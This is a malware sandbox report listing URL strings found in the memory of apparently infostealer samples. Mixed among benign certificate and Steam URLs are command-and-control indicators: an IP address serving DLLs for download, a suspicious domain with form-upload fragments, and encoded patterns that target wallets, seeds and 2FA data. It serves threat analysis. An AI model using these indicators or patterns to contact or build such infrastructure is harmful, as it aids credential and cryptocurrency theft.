                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, EHIJJDGDHD.exe.11.dr, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, Windows_Services_AS[1].exe.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: Windows_Services_AS[1].exe.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                    Source: mg9LPWGtPB.exe, EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, EHIJJDGDHD.exe.11.dr, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, Windows_Services_AS[1].exe.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, EHIJJDGDHD.exe.11.dr, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, Windows_Services_AS[1].exe.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0A
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, EHIJJDGDHD.exe.11.dr, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, Windows_Services_AS[1].exe.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0N
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, EHIJJDGDHD.exe.11.dr, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, Windows_Services_AS[1].exe.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0X
                    Source: mg9LPWGtPB.exeString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                    Source: mg9LPWGtPB.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                    Source: mg9LPWGtPB.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                    Source: mg9LPWGtPB.exeString found in binary or memory: http://ocsp.globalsign.com/rootr103
                    Source: mg9LPWGtPB.exeString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                    Source: mg9LPWGtPB.exe, 00000000.00000003.2003742764.0000000002905000.00000004.00000020.00020000.00000000.sdmp, EHIJJDGDHD.exe, 00000010.00000003.3035364924.00000000027B8000.00000004.00000020.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3094253513.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3928833943.0000000003417000.00000004.00000020.00020000.00000000.sdmp, Knitting.0.dr, Bk.pif.17.dr, Performing.16.dr, SolarSys.pif.29.dr, Hist.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesigng20
                    Source: mg9LPWGtPB.exeString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                    Source: EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
                    Source: EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.drString found in binary or memory: http://s.symcd.com06
                    Source: mg9LPWGtPB.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                    Source: mg9LPWGtPB.exe, 00000000.00000003.2003742764.0000000002905000.00000004.00000020.00020000.00000000.sdmp, EHIJJDGDHD.exe, 00000010.00000003.3035364924.00000000027B8000.00000004.00000020.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3094253513.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3928833943.0000000003417000.00000004.00000020.00020000.00000000.sdmp, Knitting.0.dr, Bk.pif.17.dr, Performing.16.dr, SolarSys.pif.29.dr, Hist.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt04
                    Source: mg9LPWGtPB.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                    Source: mg9LPWGtPB.exe, 00000000.00000003.2003742764.0000000002905000.00000004.00000020.00020000.00000000.sdmp, EHIJJDGDHD.exe, 00000010.00000003.3035364924.00000000027B8000.00000004.00000020.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3094253513.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3928833943.0000000003417000.00000004.00000020.00020000.00000000.sdmp, Knitting.0.dr, Bk.pif.17.dr, Performing.16.dr, SolarSys.pif.29.dr, Hist.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
                    Source: mg9LPWGtPB.exeString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                    Source: mg9LPWGtPB.exeString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://survey-smiles.com
                    Source: Hist.pif, 0000000B.00000002.3072148698.00000000015DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://survey-smiles.com/
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://survey-smiles.com/S
                    Source: Hist.pif, 0000000B.00000002.3072148698.00000000015DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://survey-smiles.com/zl
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.:
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.arp
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.arpKJJJJKFCGCB3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY2
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.arpKJJJJKFCGCBm-data;
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.arpdabl
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.arpdabl.
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.arpdabl.KFCGCB
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.arpdabl.org
                    Source: Hist.pif, 0000000B.00000002.3072148698.00000000015C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tea.arpdabl.org/
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.arpdabl.orgGCB
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.arpdablJKFCGCB
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.arpdablJKFCGCB7fc76XQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://tea.arpultipart/form-data;
                    Source: EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                    Source: EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                    Source: EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                    Source: mg9LPWGtPB.exe, 00000000.00000003.2003742764.0000000002905000.00000004.00000020.00020000.00000000.sdmp, EHIJJDGDHD.exe, 00000010.00000003.3035364924.00000000027B8000.00000004.00000020.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3094253513.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3928833943.0000000003417000.00000004.00000020.00020000.00000000.sdmp, Knitting.0.dr, Bk.pif.17.dr, Performing.16.dr, SolarSys.pif.29.dr, Hist.pif.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/0
                    Source: mg9LPWGtPB.exe, 00000000.00000003.2014471927.0000000002911000.00000004.00000020.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3070815908.00000000000E8000.00000002.00000001.01000000.00000005.sdmp, EHIJJDGDHD.exe, 00000010.00000003.3034260279.00000000027BC000.00000004.00000020.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3094253513.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Bk.pif, 0000001D.00000000.3082576315.0000000001008000.00000002.00000001.01000000.0000000C.sdmp, SolarSys.pif, 00000026.00000002.3134735771.0000000000408000.00000002.00000001.01000000.0000000E.sdmp, SolarSys.pif, 00000027.00000002.3134290107.0000000000408000.00000002.00000001.01000000.0000000E.sdmp, Bk.pif.17.dr, Univ.0.dr, Effectiveness.16.dr, SolarSys.pif.29.dr, Hist.pif.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, EHIJJDGDHD.exe.11.dr, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, Windows_Services_AS[1].exe.11.dr, mozglue.dll.11.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: Hist.pif, 0000000B.00000002.3103223842.000000006C52D000.00000002.00000001.01000000.00000009.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                    Source: Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078346010.000000000C8AD000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                    Source: 76561199735694209[1].htm.11.drString found in binary or memory: https://65.109.241.221
                    Source: Hist.pif, 0000000B.00000002.3072148698.00000000015C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221/
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221/freebl3.dll
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221/freebl3.dllN
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221/mozglue.dll
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221/msvcp140.dll
                    Source: Hist.pif, 0000000B.00000002.3072148698.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221/nss3.dll
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221/softokn3.dll
                    Source: Hist.pif, 0000000B.00000002.3072148698.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221/sqlt.dll
                    Source: Hist.pif, 0000000B.00000002.3072148698.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221/sqlt.dllV
                    Source: Hist.pif, 0000000B.00000002.3072148698.00000000015DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221/vcruntime140.dll-
                    Source: Hist.pif, 0000000B.00000002.3072148698.00000000015C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221/vcruntime140.dll2
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://65.109.241.221GCA
                    Source: GCFIIE.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: 76561199735694209[1].htm.11.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                    Source: Hist.pif, 0000000B.00000002.3072722051.0000000004653000.00000004.00000800.00020000.00000000.sdmp, HCFBKK.11.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                    Source: Hist.pif, 0000000B.00000002.3072722051.0000000004653000.00000004.00000800.00020000.00000000.sdmp, HCFBKK.11.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                    Source: GCFIIE.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: GCFIIE.11.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: GCFIIE.11.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=yK1lsR1Hg7a0&a
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=b0ttg8aG
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=laxk
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=iXlDmMaqrwHh&l=e
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                    Source: 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/he
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
